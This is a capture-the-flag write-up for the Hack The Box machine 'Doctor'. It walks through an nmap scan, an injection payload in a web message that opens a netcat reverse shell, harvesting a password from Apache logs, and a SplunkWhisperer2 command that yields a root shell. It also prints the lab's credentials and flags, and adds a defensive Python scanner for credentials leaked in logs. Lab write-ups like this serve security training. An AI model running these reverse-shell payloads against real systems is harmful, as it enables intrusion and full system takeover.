| Name | Doctor |
|---|---|
| OS | Linux |
| Difficulty | Easy |
| Base Points | 20 |
| Release Date | 26 September 2020 |
| IP | 10.10.10.209 |
Starting with an Nmap scan.

```
sudo nmap -A 10.10.10.209
```

Results:

```
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-18 00:42 EST
Nmap scan report for 10.10.10.209
Host is up (0.26s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Doctor
8089/tcp open  ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2020-09-06T15:57:27
|_Not valid after:  2023-09-06T15:57:27
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.32 (91%), Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Adtran 424RG FTTH gateway (86%), Linux 2.6.32 - 3.1 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   252.40 ms 10.10.14.1
2   252.41 ms 10.10.10.209

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.15 seconds
```
From the scan results I found a web server running on port 80 and a Splunk service (splunkd) running on port 8089.

On the web server I found an email address, info@doctors.htb, so I added doctors.htb to my /etc/hosts. Then I went back to the site, registered an account and logged into the portal.

The dashboard was empty, but there was an option to create a new message. I tried a couple of things that didn't work; later I found that this message section is vulnerable to Server-Side Template Injection (SSTI).
I used the payloads from PayloadsAllTheThings and found that the target uses a Jinja2 template, so a reverse shell can be spawned with the following message.

Note: the one from PayloadsAllTheThings didn't work for me.

```
<img src=http://10.10.14.24/$(nc.traditional$IFS-e$IFS/bin/sh$IFS'10.10.14.24'$IFS'4321')>
```
On posting the above message I got a reverse shell as "web", so I enumerated and escalated to the user "shaun".

```
kali@kali:~$ nc -nlvp 4321
listening on [any] 4321 ...
connect to [10.10.14.24] from (UNKNOWN) [10.10.10.209] 38596
whoami
web
groups
web adm
```
Membership in the adm group gives read access to the apache2 logs, so I went to check them.

```
cat /var/log/apache2/access.log
...
10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" ...
cat /etc/passwd
...
shaun:x:1002:1002:shaun,,,:/home/shaun:/bin/bash
```
Username: shaun
Password: Guitar123
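The credential above leaked because the reset form sent its data in the query string, which Apache writes to access.log where any adm member can read it. As an added defensive check that is not part of the original writeup, here is a stdlib-only Python scanner that walks access-log lines and flags requests to credential-handling endpoints that carry a query string; the sample log lines (modelled on the one found on the box) and the SENSITIVE_PATHS list are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines: the first is modelled on the
# reset_password request found on the box, the rest are filler traffic.
SAMPLE_LOG = """\
10.10.14.4 - - [05/Sep/2020:11:17:34 +0000] "POST /reset_password?email=Guitar123 HTTP/1.1" 500 453 "-" "Mozilla/5.0"
10.10.14.4 - - [05/Sep/2020:11:18:02 +0000] "GET /home HTTP/1.1" 200 1237 "-" "Mozilla/5.0"
10.10.14.4 - - [05/Sep/2020:11:19:10 +0000] "POST /login HTTP/1.1" 302 210 "-" "Mozilla/5.0"
10.10.14.4 - - [05/Sep/2020:11:20:41 +0000] "GET /login?password=hunter2 HTTP/1.1" 200 980 "-" "Mozilla/5.0"
"""

# Apache combined/common log format: client IP, timestamp, request line, status.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Endpoints that handle credentials (assumed list; adjust per application).
# A query string on any of them means form data, and possibly a secret,
# has been written to a log file that is readable by the adm group.
SENSITIVE_PATHS = {"/login", "/reset_password", "/register", "/change_password"}


def find_leaked_params(log_text):
    """Return (ip, path, {param: [values]}) for every request to a
    sensitive endpoint whose URL carried a non-empty query string."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a recognisable access-log line
        parts = urlsplit(m.group("target"))
        if parts.path in SENSITIVE_PATHS and parts.query:
            hits.append((m.group("ip"), parts.path, parse_qs(parts.query)))
    return hits


if __name__ == "__main__":
    for ip, path, params in find_leaked_params(SAMPLE_LOG):
        print(f"{ip} sent form data in the query string to {path}: {params}")
```

The fix on the application side is to send such data in the request body over POST only and to scrub sensitive parameters from the log format; the scanner is useful for auditing existing logs before they are shared or retained.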
Let's log in and grab the user flag.

```
su shaun
Password: Guitar123
whoami
shaun
cat user.txt
a85739cba9b98a8827889a5d82f1ab76
```
From the Nmap results I knew that a Splunk server was running, so I googled it and found a privilege escalation tool named SplunkWhisperer2.

Run a netcat listener on your attack machine and execute the following command:

```
python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.24 --username shaun --password Guitar123 --payload 'nc.traditional -e /bin/bash '10.10.14.24' '1234''
```
On the netcat listener:

```
kali@kali:~$ nc -lvp 1234
listening on [any] 1234 ...
connect to [10.10.14.24] from (UNKNOWN) [10.10.10.209] 36622
whoami
root
cat /root/root.txt
e473b6f7387f35236053fba164d97b90
```